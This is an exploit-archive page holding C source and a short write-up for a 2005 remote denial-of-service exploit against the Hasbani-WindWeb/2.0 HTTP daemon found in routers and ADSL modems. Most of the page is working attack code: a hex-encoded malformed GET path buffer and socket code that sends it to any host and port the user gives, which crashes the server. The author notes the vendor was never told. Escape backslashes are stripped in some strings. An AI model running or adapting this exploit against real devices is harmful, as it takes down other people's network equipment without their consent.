Hasbani-WindWeb/2.0 - HTTP GET Remote DoS

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Hasbani-WindWeb/2.0 - HTTP GET Remote DoS
# Published : 2005-10-27
# Author : Expanders
# Previous Title : MS Internet Explorer 6.0 (mshtmled.dll) Denial of Service Exploit
# Next Title : MS Windows Plug-and-Play (Umpnpmgr.dll) DoS Exploit (MS05-047) (2)
/*
       _______         ________           .__        _____          __
___  __   _     ____ _____            |  |__    /  |  |   ____ |  | __
  /  /  /_   /      _(__  <   ______ |  |    /   |  |__/ ___|  |/ /
 >    <  _/      |  /        /_____/ |   Y  /    ^   /  ___|    <
/__/_ \_____  /___|  /______  /         |___|  /____   |  ___  >__|_ 
      /      /     /       /   2695    /      |__|      /     /

[i] Title:              Hasbani-WindWeb/2.0 - HTTP GET  Remote DoS
[i] Discovered by:      Expanders
[i] Exploit by:         Expanders

[ What is Hasbani-WindWeb/2.0 ]

Hasbani server is a httpd created for menaging ethernet routers and adsl modems.

[ Why HTTPD crash? ]

Causes of DoS are not perfecly known by me 'cos i can't debug a chip-integrated http daemon.
Btw seems that Hasbani enter a loop in a GET /..:..:..etc. condition, causes that when an attacker reguest a long crafted string
server enter an endless loop with conseguenly crash of the httpd.

NOTE: This exploit DON'T drop down victim's adsl connection!

[ Timeline ]

This vulnerability was not comunicated because i did'n find Hasbani's vendor.

[ Links ]

www.x0n3-h4ck.org



*/

#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>

#define BUGSTR "GET %s HTTP/1.0nnn" // Command where bug reside


char evilrequest[] = {
0x2f, 0x2e, 0x2e, 0x3a,
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x78, 0x30, 0x6e, 0x33, 
0x2d, 0x68, 0x34, 0x63, 0x6b, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e };

fd_set readfds;
int banner();
int usage(char *filename);
int remote_connect( char* ip, unsigned short port );

int banner() {
  printf("n       _______         ________           .__        _____          __     n");
  printf("___  __\   _  \   ____ \_____  \          |  |__    /  |  |   ____ |  | __ n");
  printf("\  \/  /  /_\  \ /    \  _(__  <   ______ |  |  \  /   |  |__/ ___\|  |/ / n");
  printf(" >    <\  \_/   \   |  \/       \ /_____/ |   Y  \/    ^   /\  \___|    <  n");
  printf("/__/\_ \\_____  /___|  /______  /         |___|  /\____   |  \___  >__|_ \ n");
  printf("      \/      \/     \/       \/               \/      |__|      \/     \/ nn");
  printf("[i] Title:              tHasbani-WindWeb/2.0 - HTTP GET  Remote DoSn");
  printf("[i] Discovered by:      tExpandersn");
  printf("[i] Proof of concept by:tExpandersnn");
  return 0;
}

int usage(char *filename) {
  printf("Usage: t%s HOST <port>   ::   default HTTPD port: 80nn",filename);
  exit(0);
}

int remote_connect( char* ip, unsigned short port )
{
  int s;
  struct sockaddr_in remote_addr;
  struct hostent* host_addr;

  memset ( &remote_addr, 0x0, sizeof ( remote_addr ) );
  if ( ( host_addr = gethostbyname ( ip ) ) == NULL )
  {
   printf ( "[X] Cannot resolve "%s"n", ip );
   exit ( 1 );
  }
  remote_addr.sin_family = AF_INET;
  remote_addr.sin_port = htons ( port );
  remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );
  if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )
  {
   printf ( "[X] Socket failed!n" );
   exit(1);
  }
  if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) ==  -1 )
  {
   printf ( "[X] Failed connecting!n" );
          exit(1);
  }
  return ( s );
}


int main(int argc, char *argv[]) {
    int s,n;
    unsigned int rcv;
    char *request;
    char recvbuf[256];
    banner();
    if( argc < 3)
        argv[2] = "80";
    else if ((atoi(argv[2]) < 1) || (atoi(argv[2]) > 65534))
         usage(argv[0]);
    if( (argc < 2) )
        usage(argv[0]);
    request = (char *) malloc(1024);
    printf("[+] Connecting to remote hostn");
    s = remote_connect(argv[1],atoi(argv[2]));
    sleep(1);
    printf("[+] Creating buffern");
    sprintf(request,BUGSTR,evilrequest);
    printf("[+] Sending %d bytes of painfull buffern",strlen(evilrequest));
    if ( send ( s, request, strlen (request), 0) <= 0 )
    {
            printf("[X] Failed to send buffern");
            close(s);
            exit(1);
    }
    sleep(1);
    printf("[+] Done, Packet Sentn");
    close(s);
    free(request);
    request = NULL;
    return 0;
}